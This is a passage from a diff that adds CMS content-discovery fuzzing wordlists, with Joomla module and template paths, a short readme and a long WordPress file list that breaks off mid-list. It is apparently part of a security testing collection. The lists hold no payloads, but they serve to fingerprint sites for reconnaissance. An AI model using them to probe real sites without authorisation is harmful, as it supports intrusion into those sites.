+modules/mod_stats/
+modules/mod_swmenufree/
+modules/mod_syndicate/
+modules/mod_tcimageslider/
+modules/mod_users_latest/
+modules/mod_virtuemart/
+modules/mod_virtuemart_search/
+modules/mod_virtuemart_topten/
+modules/mod_vvisit_counter/
+modules/mod_weblinks/
+modules/mod_whosonline/
+modules/mod_woodychat/
+modules/mod_wrapper/
+modules/shoutbox/

Discovery/CMS/joomla_themes.fuzz.txt

@@ -0,0 +1,30 @@
+templates/abc/
+templates/atomic/
+templates/b59-tpl8/
+templates/beez/
+templates/carbon_07/
+templates/crub/
+templates/dm_arrow_red/
+templates/gk_eshoptrix_2/
+templates/gk_gomuproject/
+templates/gk_icki_sports/
+templates/gk_musictop/
+templates/ja_purity/
+templates/ja_rochea/
+templates/ja_teline_ii/
+templates/joomlaport_metro/
+templates/js_relevant/
+templates/mynxx_j15/
+templates/planets/
+templates/planetsv2/
+templates/rhuk_milkyway/
+templates/rt_hivemind_j15/
+templates/rt_mediamogul_essentials_j15/
+templates/rt_nexus_j15/
+templates/siteground99/
+templates/siteground-j15-14/
+templates/siteground-j15-68/
+templates/siteground-j15-86/
+templates/system/
+templates/yoo_phoenix/
+templates/yoo_waybeyond/

Discovery/CMS/readme.txt

@@ -0,0 +1,5 @@
+# some files generated with cms-explorer
+http://code.google.com/p/cms-explorer/
+use these for q&d but cms explorer does a lot more
+
+# wordpress.fuzz.txt generating by cat >>, sort, uniq of multiple versions of wordpress for wordpress into one fuzzfile, for maximum detection in full effect, yo 

Discovery/CMS/wordpress.fuzz.txt

@@ -0,0 +1,873 @@
+index.php
+license.txt
+readme.html
+wp-activate.php
+wp-admin/
+wp-admin/admin-ajax.php
+wp-admin/admin-db.php
+wp-admin/admin-footer.php
+wp-admin/admin-functions.php
+wp-admin/admin-header.php
+wp-admin/admin.php
+wp-admin/admin-post.php
+wp-admin/async-upload.php
+wp-admin/bookmarklet.php
+wp-admin/categories.js
+wp-admin/categories.php
+wp-admin/cat.js
+wp-admin/comment.php
+wp-admin/css/
+wp-admin/css/colors-classic.css
+wp-admin/css/colors-classic.dev.css
+wp-admin/css/colors-classic-rtl.css
+wp-admin/css/colors-classic-rtl.dev.css
+wp-admin/css/colors-fresh.css
+wp-admin/css/colors-fresh.dev.css
+wp-admin/css/colors-fresh-rtl.css
+wp-admin/css/colors-fresh-rtl.dev.css
+wp-admin/css/dashboard.css
+wp-admin/css/dashboard.dev.css
+wp-admin/css/dashboard-rtl.css
+wp-admin/css/dashboard-rtl.dev.css
+wp-admin/css/farbtastic.css
+wp-admin/css/farbtastic-rtl.css
+wp-admin/css/global.css
+wp-admin/css/global.dev.css
+wp-admin/css/global-rtl.css
+wp-admin/css/global-rtl.dev.css
+wp-admin/css/ie.css
+wp-admin/css/ie.dev.css
+wp-admin/css/ie-rtl.css
+wp-admin/css/ie-rtl.dev.css
+wp-admin/css/install.css
+wp-admin/css/install.dev.css
+wp-admin/css/install-rtl.css
+wp-admin/css/install-rtl.dev.css
+wp-admin/css/login.css
+wp-admin/css/login.dev.css
+wp-admin/css/login-rtl.css
+wp-admin/css/login-rtl.dev.css
+wp-admin/css/media.css
+wp-admin/css/media.dev.css
+wp-admin/css/media-rtl.css
+wp-admin/css/media-rtl.dev.css
+wp-admin/css/ms.css
+wp-admin/css/ms.dev.css
+wp-admin/css/nav-menu.css
+wp-admin/css/nav-menu.dev.css
+wp-admin/css/nav-menu-rtl.css
+wp-admin/css/nav-menu-rtl.dev.css
+wp-admin/css/plugin-install.css
+wp-admin/css/plugin-install.dev.css
+wp-admin/css/plugin-install-rtl.css
+wp-admin/css/plugin-install-rtl.dev.css
+wp-admin/css/press-this.css
+wp-admin/css/press-this.dev.css
+wp-admin/css/press-this-rtl.css
+wp-admin/css/press-this-rtl.dev.css
+wp-admin/css/theme-editor.css
+wp-admin/css/theme-editor.dev.css
+wp-admin/css/theme-editor-rtl.css
+wp-admin/css/theme-editor-rtl.dev.css
+wp-admin/css/theme-install.css
+wp-admin/css/theme-install.dev.css
+wp-admin/css/widgets.css
+wp-admin/css/widgets.dev.css
+wp-admin/css/widgets-rtl.css
+wp-admin/css/widgets-rtl.dev.css
+wp-admin/css/wp-admin.css
+wp-admin/css/wp-admin.dev.css
+wp-admin/css/wp-admin-rtl.css
+wp-admin/css/wp-admin-rtl.dev.css
+wp-admin/custom-background.php
+wp-admin/custom-fields.js
+wp-admin/custom-header.php
+wp-admin/dbx-admin-key.js
+wp-admin/edit-attachment-rows.php
+wp-admin/edit-category-form.php
+wp-admin/edit-comments.js
+wp-admin/edit-comments.php
+wp-admin/edit-form-advanced.php
+wp-admin/edit-form-comment.php
+wp-admin/edit-form.php
+wp-admin/edit-link-categories.php
+wp-admin/edit-link-category-form.php
+wp-admin/edit-link-form.php
+wp-admin/edit-page-form.php
+wp-admin/edit-pages.php
+wp-admin/edit.php
+wp-admin/edit-post-rows.php
+wp-admin/edit-tag-form.php
+wp-admin/edit-tags.php
+wp-admin/export.php
+wp-admin/gears-manifest.php
+wp-admin/images/
+wp-admin/images/align-center.png
+wp-admin/images/align-left.png
+wp-admin/images/align-none.png
+wp-admin/images/align-right.png
+wp-admin/images/archive-link.png
+wp-admin/images/blue-grad.png
+wp-admin/images/box-bg.gif
+wp-admin/images/box-bg-left.gif
+wp-admin/images/box-bg-right.gif
+wp-admin/images/box-butt.gif
+wp-admin/images/box-butt-left.gif
+wp-admin/images/box-butt-right.gif
+wp-admin/images/box-head.gif
+wp-admin/images/box-head-left.gif
+wp-admin/images/box-head-right.gif
+wp-admin/images/browse-happy.gif
+wp-admin/images/bubble_bg.gif
+wp-admin/images/bubble_bg-rtl.gif
+wp-admin/images/button-grad-active.png
+wp-admin/images/button-grad-active-vs.png
+wp-admin/images/button-grad.png
+wp-admin/images/button-grad-vs.png
+wp-admin/images/comment-grey-bubble.png
+wp-admin/images/date-button.gif
+wp-admin/images/ed-bg.gif
+wp-admin/images/ed-bg-vs.gif
+wp-admin/images/fade-butt.png
+wp-admin/images/fav-arrow.gif
+wp-admin/images/fav-arrow-rtl.gif
+wp-admin/images/fav-arrow-vs.gif
+wp-admin/images/fav-arrow-vs-rtl.gif
+wp-admin/images/fav.png
+wp-admin/images/fav-top-vs.gif
+wp-admin/images/fav-vs.png
+wp-admin/images/generic.png
+wp-admin/images/gray-grad.png
+wp-admin/images/icons32.png
+wp-admin/images/icons32-vs.png
+wp-admin/images/imgedit-icons.png
+wp-admin/images/list.png
+wp-admin/images/list-vs.png
+wp-admin/images/loading.gif
+wp-admin/images/loading-publish.gif
+wp-admin/images/login-bkg-bottom.gif
+wp-admin/images/login-bkg-tile.gif
+wp-admin/images/login-header.png
+wp-admin/images/logo-ghost.png
+wp-admin/images/logo.gif
+wp-admin/images/logo-login.gif
+wp-admin/images/marker.png
+wp-admin/images/mask.png
+wp-admin/images/media-button-image.gif
+wp-admin/images/media-button-music.gif
+wp-admin/images/media-button-other.gif
+wp-admin/images/media-button-video.gif
+wp-admin/images/menu-arrows.gif
+wp-admin/images/menu-bits.gif
+wp-admin/images/menu-bits-rtl.gif
+wp-admin/images/menu-bits-rtl-vs.gif
+wp-admin/images/menu-bits-vs.gif
+wp-admin/images/menu-dark.gif
+wp-admin/images/menu-dark-rtl.gif
+wp-admin/images/menu.png
+wp-admin/images/menu-vs.png
+wp-admin/images/no.png
+wp-admin/images/notice.gif
+wp-admin/images/required.gif
+wp-admin/images/resize.gif
+wp-admin/images/screen-options-right.gif
+wp-admin/images/screen-options-right-up.gif
+wp-admin/images/se.png
+wp-admin/images/star.gif
+wp-admin/images/toggle-arrow.gif
+wp-admin/images/toggle-arrow-rtl.gif
+wp-admin/images/toggle.gif
+wp-admin/images/visit-site-button-grad.gif
+wp-admin/images/visit-site-button-grad-vs.gif
+wp-admin/images/wheel.png
+wp-admin/images/white-grad-active.png
+wp-admin/images/white-grad.png
+wp-admin/images/widgets-arrow.gif
+wp-admin/images/wordpress-logo.png
+wp-admin/images/wp-logo.png
+wp-admin/images/wp-logo-vs.gif
+wp-admin/images/wp-logo-vs.png
+wp-admin/images/wpspin_dark.gif
+wp-admin/images/wpspin_light.gif
+wp-admin/images/xit.gif
+wp-admin/images/yes.png
+wp-admin/import/
+wp-admin/import/blogger.php
+wp-admin/import/blogware.php
+wp-admin/import/dotclear.php
+wp-admin/import/greymatter.php
+wp-admin/import/livejournal.php
+wp-admin/import/mt.php
+wp-admin/import.php
+wp-admin/import/rss.php
+wp-admin/import/textpattern.php
+wp-admin/import/wordpress.php
+wp-admin/includes/
+wp-admin/includes/admin.php
+wp-admin/includes/bookmark.php
+wp-admin/includes/class-ftp.php
+wp-admin/includes/class-ftp-pure.php
+wp-admin/includes/class-ftp-sockets.php
+wp-admin/includes/class-pclzip.php
+wp-admin/includes/class-wp-filesystem-base.php
+wp-admin/includes/class-wp-filesystem-direct.php
+wp-admin/includes/class-wp-filesystem-ftpext.php
+wp-admin/includes/class-wp-filesystem-ftpsockets.php
+wp-admin/includes/class-wp-filesystem-ssh2.php
+wp-admin/includes/class-wp-importer.php
+wp-admin/includes/class-wp-upgrader.php
+wp-admin/includes/comment.php
+wp-admin/includes/continents-cities.php
+wp-admin/includes/dashboard.php
+wp-admin/includes/deprecated.php
+wp-admin/includes/export.php
+wp-admin/includes/file.php
+wp-admin/includes/image-edit.php
+wp-admin/includes/image.php
+wp-admin/includes/import.php
+wp-admin/includes/manifest.php
+wp-admin/includes/media.php
+wp-admin/includes/meta-boxes.php
+wp-admin/includes/misc.php
+wp-admin/includes/ms-deprecated.php
+wp-admin/includes/ms.php
+wp-admin/includes/nav-menu.php
+wp-admin/includes/plugin-install.php
+wp-admin/includes/plugin.php
+wp-admin/includes/post.php
+wp-admin/includes/schema.php
+wp-admin/includes/taxonomy.php
+wp-admin/includes/template.php
+wp-admin/includes/theme-install.php
+wp-admin/includes/theme.php
+wp-admin/includes/update-core.php
+wp-admin/includes/update.php
+wp-admin/includes/upgrade.php
+wp-admin/includes/user.php
+wp-admin/includes/widgets.php
+wp-admin/index-extra.php
+wp-admin/index.php
+wp-admin/install.css
+wp-admin/install-helper.php
+wp-admin/install.php
+wp-admin/install-rtl.css
+wp-admin/js/
+wp-admin/js/cat.dev.js
+wp-admin/js/categories.dev.js
+wp-admin/js/categories.js
+wp-admin/js/cat.js
+wp-admin/js/comment.dev.js
+wp-admin/js/comment.js
+wp-admin/js/common.dev.js
+wp-admin/js/common.js
+wp-admin/js/custom-background.dev.js
+wp-admin/js/custom-background.js
+wp-admin/js/custom-fields.dev.js
+wp-admin/js/custom-fields.js
+wp-admin/js/dashboard.dev.js
+wp-admin/js/dashboard.js
+wp-admin/js/edit-comments.dev.js
+wp-admin/js/edit-comments.js
+wp-admin/js/editor.dev.js
+wp-admin/js/editor.js
+wp-admin/js/farbtastic.js
+wp-admin/js/gallery.dev.js
+wp-admin/js/gallery.js
+wp-admin/js/image-edit.dev.js
+wp-admin/js/image-edit.js
+wp-admin/js/inline-edit-post.dev.js
+wp-admin/js/inline-edit-post.js
+wp-admin/js/inline-edit-tax.dev.js
+wp-admin/js/inline-edit-tax.js
+wp-admin/js/link.dev.js
+wp-admin/js/link.js
+wp-admin/js/media.dev.js
+wp-admin/js/media.js
+wp-admin/js/media-upload.dev.js
+wp-admin/js/media-upload.js
+wp-admin/js/nav-menu.dev.js
+wp-admin/js/nav-menu.js
+wp-admin/js/password-strength-meter.dev.js
+wp-admin/js/password-strength-meter.js
+wp-admin/js/plugin-install.dev.js
+wp-admin/js/plugin-install.js
+wp-admin/js/postbox.dev.js
+wp-admin/js/postbox.js
+wp-admin/js/post.dev.js
+wp-admin/js/post.js
+wp-admin/js/revisions-js.php
+wp-admin/js/set-post-thumbnail.dev.js
+wp-admin/js/set-post-thumbnail.js
+wp-admin/js/tags.dev.js
+wp-admin/js/tags.js
+wp-admin/js/theme-preview.dev.js
+wp-admin/js/theme-preview.js
+wp-admin/js/user-profile.dev.js
+wp-admin/js/user-profile.js
+wp-admin/js/utils.dev.js
+wp-admin/js/utils.js
+wp-admin/js/widgets.dev.js
+wp-admin/js/widgets.js
+wp-admin/js/word-count.dev.js
+wp-admin/js/word-count.js
+wp-admin/js/xfn.dev.js
+wp-admin/js/xfn.js
+wp-admin/link-add.php
+wp-admin/link-category.php
+wp-admin/link-import.php
+wp-admin/link-manager.php
+wp-admin/link-parse-opml.php
+wp-admin/link.php
+wp-admin/load-scripts.php
+wp-admin/load-styles.php
+wp-admin/maint/
+wp-admin/maint/repair.php
+wp-admin/media-new.php
+wp-admin/media.php
+wp-admin/media-upload.php
+wp-admin/menu-header.php
+wp-admin/menu.php
+wp-admin/moderation.php
+wp-admin/ms-admin.php
+wp-admin/ms-delete-site.php
+wp-admin/ms-edit.php
+wp-admin/ms-options.php
+wp-admin/ms-sites.php
+wp-admin/ms-themes.php
+wp-admin/ms-upgrade-network.php
+wp-admin/ms-users.php
+wp-admin/my-sites.php
+wp-admin/nav-menus.php
+wp-admin/network.php
+wp-admin/options-discussion.php
+wp-admin/options-general.php
+wp-admin/options-head.php
+wp-admin/options-media.php
+wp-admin/options-misc.php
+wp-admin/options-permalink.php
+wp-admin/options.php
+wp-admin/options-privacy.php
+wp-admin/options-reading.php
+wp-admin/options-writing.php
+wp-admin/page-new.php
+wp-admin/page.php
+wp-admin/plugin-editor.php
+wp-admin/plugin-install.php
+wp-admin/plugins.php
+wp-admin/post-new.php
+wp-admin/post.php
+wp-admin/press-this.php
+wp-admin/profile.php
+wp-admin/profile-update.php
+wp-admin/revision.php
+wp-admin/rtl.css
+wp-admin/setup-config.php
+wp-admin/sidebar.php
+wp-admin/templates.php
+wp-admin/theme-editor.php
+wp-admin/theme-install.php
+wp-admin/themes.php
+wp-admin/tools.php
+wp-admin/update-core.php
+wp-admin/update-links.php
+wp-admin/update.php
+wp-admin/upgrade-functions.php
+wp-admin/upgrade.php
+wp-admin/upgrade-schema.php
+wp-admin/upload.css
+wp-admin/upload-functions.php
+wp-admin/upload.js
+wp-admin/upload.php
+wp-admin/upload-rtl.css
+wp-admin/user-edit.php
+wp-admin/user-new.php
+wp-admin/users.js
+wp-admin/users.php
+wp-admin/widgets.css
+wp-admin/widgets.php
+wp-admin/widgets-rtl.css
+wp-admin/wp-admin.css
+wp-admin/xfn.js
+wp-app.php
+wp-atom.php
+wp-blog-header.php
+wp-comments-post.php
+wp-commentsrss2.php
+wp-config-sample.php
+wp-content/
+wp-content/index.php
+wp-content/plugins/
+wp-content/plugins/akismet/
+wp-content/plugins/akismet/admin.php
+wp-content/plugins/akismet/akismet.gif
+wp-content/plugins/akismet/akismet.php
+wp-content/plugins/akismet/legacy.php
+wp-content/plugins/akismet/readme.txt
+wp-content/plugins/hello.php
+wp-content/plugins/index.php
+wp-content/themes/
+wp-content/themes/classic/
+wp-content/themes/classic/comments.php
+wp-content/themes/classic/comments-popup.php
+wp-content/themes/classic/footer.php
+wp-content/themes/classic/functions.php
+wp-content/themes/classic/header.php
+wp-content/themes/classic/index.php
+wp-content/themes/classic/screenshot.png
+wp-content/themes/classic/sidebar.php
+wp-content/themes/classic/style.css
+wp-content/themes/default/
+wp-content/themes/default/404.php
+wp-content/themes/default/archive.php
+wp-content/themes/default/archives.php
+wp-content/themes/default/attachment.php
+wp-content/themes/default/comments.php
+wp-content/themes/default/comments-popup.php
+wp-content/themes/default/footer.php
+wp-content/themes/default/functions.php
+wp-content/themes/default/header.php
+wp-content/themes/default/images/
+wp-content/themes/default/images/audio.jpg
+wp-content/themes/default/images/header-img.php
+wp-content/themes/default/images/kubrickbgcolor.jpg
+wp-content/themes/default/images/kubrickbg-ltr.jpg
+wp-content/themes/default/images/kubrickbg-rtl.jpg
+wp-content/themes/default/images/kubrickbgwide.jpg
+wp-content/themes/default/images/kubrickfooter.jpg
+wp-content/themes/default/images/kubrickheader.jpg
+wp-content/themes/default/index.php
+wp-content/themes/default/links.php
+wp-content/themes/default/page.php
+wp-content/themes/default/rtl.css
+wp-content/themes/default/screenshot.png
+wp-content/themes/default/searchform.php
+wp-content/themes/default/search.php
+wp-content/themes/default/sidebar.php
+wp-content/themes/default/single.php
+wp-content/themes/default/style.css
+wp-content/themes/index.php
+wp-content/themes/twentyten/
+wp-content/themes/twentyten/404.php
+wp-content/themes/twentyten/archive.php
+wp-content/themes/twentyten/attachment.php
+wp-content/themes/twentyten/author.php
+wp-content/themes/twentyten/category.php
+wp-content/themes/twentyten/comments.php
+wp-content/themes/twentyten/editor-style.css
+wp-content/themes/twentyten/editor-style-rtl.css
+wp-content/themes/twentyten/footer.php
+wp-content/themes/twentyten/functions.php
+wp-content/themes/twentyten/header.php
+wp-content/themes/twentyten/images/
+wp-content/themes/twentyten/images/headers/
+wp-content/themes/twentyten/images/headers/berries.jpg
+wp-content/themes/twentyten/images/headers/berries-thumbnail.jpg
+wp-content/themes/twentyten/images/headers/cherryblossoms.jpg
+wp-content/themes/twentyten/images/headers/cherryblossoms-thumbnail.jpg
+wp-content/themes/twentyten/images/headers/concave.jpg
+wp-content/themes/twentyten/images/headers/concave-thumbnail.jpg
+wp-content/themes/twentyten/images/headers/fern.jpg
+wp-content/themes/twentyten/images/headers/fern-thumbnail.jpg
+wp-content/themes/twentyten/images/headers/forestfloor.jpg
+wp-content/themes/twentyten/images/headers/forestfloor-thumbnail.jpg
+wp-content/themes/twentyten/images/headers/inkwell.jpg
+wp-content/themes/twentyten/images/headers/inkwell-thumbnail.jpg
+wp-content/themes/twentyten/images/headers/path.jpg
+wp-content/themes/twentyten/images/headers/path-thumbnail.jpg
+wp-content/themes/twentyten/images/headers/sunset.jpg
+wp-content/themes/twentyten/images/headers/sunset-thumbnail.jpg
+wp-content/themes/twentyten/images/wordpress.png
+wp-content/themes/twentyten/index.php
+wp-content/themes/twentyten/languages/
+wp-content/themes/twentyten/languages/twentyten.pot
+wp-content/themes/twentyten/license.txt
+wp-content/themes/twentyten/loop.php
+wp-content/themes/twentyten/onecolumn-page.php
+wp-content/themes/twentyten/page.php
+wp-content/themes/twentyten/rtl.css
+wp-content/themes/twentyten/screenshot.png
+wp-content/themes/twentyten/search.php
+wp-content/themes/twentyten/sidebar-footer.php
+wp-content/themes/twentyten/sidebar.php
+wp-content/themes/twentyten/single.php
+wp-content/themes/twentyten/style.css
+wp-content/themes/twentyten/tag.php
+wp-cron.php
+wp-feed.php
+wp-includes/
+wp-includes/atomlib.php
+wp-includes/author-template.php
+wp-includes/bookmark.php
+wp-includes/bookmark-template.php
+wp-includes/cache.php
+wp-includes/canonical.php
+wp-includes/capabilities.php
+wp-includes/category.php
+wp-includes/category-template.php
+wp-includes/classes.php
+wp-includes/class-feed.php
+wp-includes/class-http.php
+wp-includes/class-IXR.php
+wp-includes/class-json.php
+wp-includes/class-oembed.php
+wp-includes/class-phpass.php
+wp-includes/class-phpmailer.php
+wp-includes/class-pop3.php
+wp-includes/class-simplepie.php
+wp-includes/class-smtp.php
+wp-includes/class-snoopy.php
+wp-includes/class.wp-dependencies.php
+wp-includes/class.wp-scripts.php
+wp-includes/class.wp-styles.php
+wp-includes/comment.php
+wp-includes/comment-template.php
+wp-includes/compat.php
+wp-includes/cron.php
+wp-includes/default-constants.php
+wp-includes/default-embeds.php
+wp-includes/default-filters.php
+wp-includes/default-widgets.php
+wp-includes/deprecated.php
+wp-includes/feed-atom-comments.php
+wp-includes/feed-atom.php
+wp-includes/feed.php
+wp-includes/feed-rdf.php
+wp-includes/feed-rss2-comments.php
+wp-includes/feed-rss2.php
+wp-includes/feed-rss.php
+wp-includes/formatting.php
+wp-includes/functions.php
+wp-includes/functions.wp-scripts.php
+wp-includes/functions.wp-styles.php
+wp-includes/general-template.php
+wp-includes/gettext.php
+wp-includes/http.php
+wp-includes/images/
+wp-includes/images/blank.gif
+wp-includes/images/crystal/
+wp-includes/images/crystal/archive.png
+wp-includes/images/crystal/audio.png
+wp-includes/images/crystal/code.png
+wp-includes/images/crystal/default.png
+wp-includes/images/crystal/document.png
+wp-includes/images/crystal/interactive.png
+wp-includes/images/crystal/license.txt
+wp-includes/images/crystal/spreadsheet.png
+wp-includes/images/crystal/text.png
+wp-includes/images/crystal/video.png
+wp-includes/images/rss.png
+wp-includes/images/smilies/
+wp-includes/images/smilies/icon_arrow.gif
+wp-includes/images/smilies/icon_biggrin.gif
+wp-includes/images/smilies/icon_confused.gif
+wp-includes/images/smilies/icon_cool.gif
+wp-includes/images/smilies/icon_cry.gif
+wp-includes/images/smilies/icon_eek.gif
+wp-includes/images/smilies/icon_evil.gif
+wp-includes/images/smilies/icon_exclaim.gif
+wp-includes/images/smilies/icon_idea.gif
+wp-includes/images/smilies/icon_lol.gif
+wp-includes/images/smilies/icon_mad.gif
+wp-includes/images/smilies/icon_mrgreen.gif
+wp-includes/images/smilies/icon_neutral.gif
+wp-includes/images/smilies/icon_question.gif
+wp-includes/images/smilies/icon_razz.gif
+wp-includes/images/smilies/icon_redface.gif
+wp-includes/images/smilies/icon_rolleyes.gif
+wp-includes/images/smilies/icon_sad.gif
+wp-includes/images/smilies/icon_smile.gif
+wp-includes/images/smilies/icon_surprised.gif
+wp-includes/images/smilies/icon_twisted.gif
+wp-includes/images/smilies/icon_wink.gif
+wp-includes/images/upload.png
+wp-includes/images/wlw/
+wp-includes/images/wlw/wp-comments.png
+wp-includes/images/wlw/wp-icon.png
+wp-includes/images/wlw/wp-watermark.png
+wp-includes/js/
+wp-includes/js/autosave.dev.js
+wp-includes/js/autosave.js
+wp-includes/js/colorpicker.dev.js
+wp-includes/js/colorpicker.js
+wp-includes/js/comment-reply.dev.js
+wp-includes/js/comment-reply.js
+wp-includes/js/crop/
+wp-includes/js/crop/cropper.css
+wp-includes/js/crop/cropper.js
+wp-includes/js/crop/marqueeHoriz.gif
+wp-includes/js/crop/marqueeVert.gif
+wp-includes/js/dbx.js
+wp-includes/js/fat.js
+wp-includes/js/hoverIntent.dev.js
+wp-includes/js/hoverIntent.js
+wp-includes/js/imgareaselect/
+wp-includes/js/imgareaselect/border-anim-h.gif
+wp-includes/js/imgareaselect/border-anim-v.gif
+wp-includes/js/imgareaselect/imgareaselect.css
+wp-includes/js/imgareaselect/jquery.imgareaselect.dev.js
+wp-includes/js/imgareaselect/jquery.imgareaselect.js
+wp-includes/js/jcrop/
+wp-includes/js/jcrop/Jcrop.gif
+wp-includes/js/jcrop/jquery.Jcrop.css
+wp-includes/js/jcrop/jquery.Jcrop.dev.js
+wp-includes/js/jcrop/jquery.Jcrop.js
+wp-includes/js/jquery/
+wp-includes/js/jquery/interface.js
+wp-includes/js/jquery/jquery.color.dev.js
+wp-includes/js/jquery/jquery.color.js
+wp-includes/js/jquery/jquery.form.dev.js
+wp-includes/js/jquery/jquery.form.js
+wp-includes/js/jquery/jquery.hotkeys.dev.js
+wp-includes/js/jquery/jquery.hotkeys.js
+wp-includes/js/jquery/jquery.js
+wp-includes/js/jquery/jquery.schedule.js
+wp-includes/js/jquery/jquery.table-hotkeys.dev.js
+wp-includes/js/jquery/jquery.table-hotkeys.js
+wp-includes/js/jquery/suggest.dev.js
+wp-includes/js/jquery/suggest.js
+wp-includes/js/jquery/ui.core.js
+wp-includes/js/jquery/ui.dialog.js
+wp-includes/js/jquery/ui.draggable.js
+wp-includes/js/jquery/ui.droppable.js
+wp-includes/js/jquery/ui.resizable.js
+wp-includes/js/jquery/ui.selectable.js
+wp-includes/js/jquery/ui.sortable.js
+wp-includes/js/jquery/ui.tabs.js
+wp-includes/js/json2.dev.js
+wp-includes/js/json2.js
+wp-includes/js/list-manipulation.js
+wp-includes/js/prototype.js
+wp-includes/js/quicktags.dev.js
+wp-includes/js/quicktags.js
+wp-includes/js/scriptaculous/
+wp-includes/js/scriptaculous/builder.js
+wp-includes/js/scriptaculous/controls.js
+wp-includes/js/scriptaculous/dragdrop.js
+wp-includes/js/scriptaculous/effects.js
+wp-includes/js/scriptaculous/MIT-LICENSE
+wp-includes/js/scriptaculous/prototype.js
+wp-includes/js/scriptaculous/scriptaculous.js
+wp-includes/js/scriptaculous/slider.js
+wp-includes/js/scriptaculous/sound.js
+wp-includes/js/scriptaculous/unittest.js
+wp-includes/js/scriptaculous/wp-scriptaculous.js
+wp-includes/js/swfobject.js
+wp-includes/js/swfupload/
+wp-includes/js/swfupload/handlers.dev.js
+wp-includes/js/swfupload/handlers.js
+wp-includes/js/swfupload/plugins/
+wp-includes/js/swfupload/plugins/swfupload.cookies.js
+wp-includes/js/swfupload/plugins/swfupload.queue.js
+wp-includes/js/swfupload/plugins/swfupload.speed.js
+wp-includes/js/swfupload/plugins/swfupload.swfobject.js
+wp-includes/js/swfupload/swfupload-all.js
+wp-includes/js/swfupload/swfupload.js
+wp-includes/js/swfupload/swfupload.swf
+wp-includes/js/thickbox/
+wp-includes/js/thickbox/loadingAnimation.gif
+wp-includes/js/thickbox/macFFBgHack.png
+wp-includes/js/thickbox/tb-close.png
+wp-includes/js/thickbox/thickbox.css
+wp-includes/js/thickbox/thickbox.js
+wp-includes/js/tinymce/
+wp-includes/js/tinymce/blank.htm
+wp-includes/js/tinymce/langs/
+wp-includes/js/tinymce/langs/en.js
+wp-includes/js/tinymce/langs/wp-langs-en.js
+wp-includes/js/tinymce/langs/wp-langs.php
+wp-includes/js/tinymce/license.html
+wp-includes/js/tinymce/license.txt
+wp-includes/js/tinymce/plugins/
+wp-includes/js/tinymce/plugins/autosave/
+wp-includes/js/tinymce/plugins/autosave/editor_plugin.js
+wp-includes/js/tinymce/plugins/autosave/editor_plugin_src.js
+wp-includes/js/tinymce/plugins/autosave/langs
+wp-includes/js/tinymce/plugins/autosave/readme.txt
+wp-includes/js/tinymce/plugins/directionality/
+wp-includes/js/tinymce/plugins/directionality/editor_plugin.js
+wp-includes/js/tinymce/plugins/directionality/images
+wp-includes/js/tinymce/plugins/directionality/langs
+wp-includes/js/tinymce/plugins/fullscreen/
+wp-includes/js/tinymce/plugins/fullscreen/editor_plugin.js
+wp-includes/js/tinymce/plugins/fullscreen/fullscreen.htm
+wp-includes/js/tinymce/plugins/inlinepopups/
+wp-includes/js/tinymce/plugins/inlinepopups/css
+wp-includes/js/tinymce/plugins/inlinepopups/editor_plugin.js
+wp-includes/js/tinymce/plugins/inlinepopups/images
+wp-includes/js/tinymce/plugins/inlinepopups/jscripts
+wp-includes/js/tinymce/plugins/inlinepopups/skins
+wp-includes/js/tinymce/plugins/inlinepopups/template.htm
+wp-includes/js/tinymce/plugins/media/
+wp-includes/js/tinymce/plugins/media/css
+wp-includes/js/tinymce/plugins/media/editor_plugin.js
+wp-includes/js/tinymce/plugins/media/img
+wp-includes/js/tinymce/plugins/media/js
+wp-includes/js/tinymce/plugins/media/media.htm
+wp-includes/js/tinymce/plugins/paste/
+wp-includes/js/tinymce/plugins/paste/blank.htm
+wp-includes/js/tinymce/plugins/paste/css
+wp-includes/js/tinymce/plugins/paste/editor_plugin.js
+wp-includes/js/tinymce/plugins/paste/images
+wp-includes/js/tinymce/plugins/paste/js
+wp-includes/js/tinymce/plugins/paste/jscripts
+wp-includes/js/tinymce/plugins/paste/langs
+wp-includes/js/tinymce/plugins/paste/pastetext.htm
+wp-includes/js/tinymce/plugins/paste/pasteword.htm
+wp-includes/js/tinymce/plugins/safari/
+wp-includes/js/tinymce/plugins/safari/blank.htm
+wp-includes/js/tinymce/plugins/safari/editor_plugin.js
+wp-includes/js/tinymce/plugins/spellchecker/
+wp-includes/js/tinymce/plugins/spellchecker/classes
+wp-includes/js/tinymce/plugins/spellchecker/config.php
+wp-includes/js/tinymce/plugins/spellchecker/css
+wp-includes/js/tinymce/plugins/spellchecker/editor_plugin.js
+wp-includes/js/tinymce/plugins/spellchecker/images
+wp-includes/js/tinymce/plugins/spellchecker/img
+wp-includes/js/tinymce/plugins/spellchecker/includes
+wp-includes/js/tinymce/plugins/spellchecker/langs
+wp-includes/js/tinymce/plugins/spellchecker/rpc.php
+wp-includes/js/tinymce/plugins/spellchecker/tinyspell.php
+wp-includes/js/tinymce/plugins/tabfocus/
+wp-includes/js/tinymce/plugins/tabfocus/editor_plugin.js
+wp-includes/js/tinymce/plugins/wordpress/
+wp-includes/js/tinymce/plugins/wordpress/css
+wp-includes/js/tinymce/plugins/wordpress/editor_plugin.dev.js
+wp-includes/js/tinymce/plugins/wordpress/editor_plugin.js
+wp-includes/js/tinymce/plugins/wordpress/images
+wp-includes/js/tinymce/plugins/wordpress/img
+wp-includes/js/tinymce/plugins/wordpress/langs
+wp-includes/js/tinymce/plugins/wordpress/popups.css
+wp-includes/js/tinymce/plugins/wordpress/wordpress.css
+wp-includes/js/tinymce/plugins/wpeditimage/
+wp-includes/js/tinymce/plugins/wpeditimage/css
+wp-includes/js/tinymce/plugins/wpeditimage/editimage.html
+wp-includes/js/tinymce/plugins/wpeditimage/editor_plugin.dev.js
+wp-includes/js/tinymce/plugins/wpeditimage/editor_plugin.js
+wp-includes/js/tinymce/plugins/wpeditimage/img
+wp-includes/js/tinymce/plugins/wpeditimage/js
+wp-includes/js/tinymce/plugins/wpgallery/
+wp-includes/js/tinymce/plugins/wpgallery/editor_plugin.dev.js
+wp-includes/js/tinymce/plugins/wpgallery/editor_plugin.js
+wp-includes/js/tinymce/plugins/wpgallery/img
+wp-includes/js/tinymce/plugins/wphelp/
+wp-includes/js/tinymce/plugins/wphelp/editor_plugin.js
+wp-includes/js/tinymce/plugins/wphelp/images
+wp-includes/js/tinymce/plugins/wphelp/langs
+wp-includes/js/tinymce/themes/
+wp-includes/js/tinymce/themes/advanced/
+wp-includes/js/tinymce/themes/advanced/about.htm
+wp-includes/js/tinymce/themes/advanced/anchor.htm
+wp-includes/js/tinymce/themes/advanced/charmap.htm
+wp-includes/js/tinymce/themes/advanced/color_picker.htm
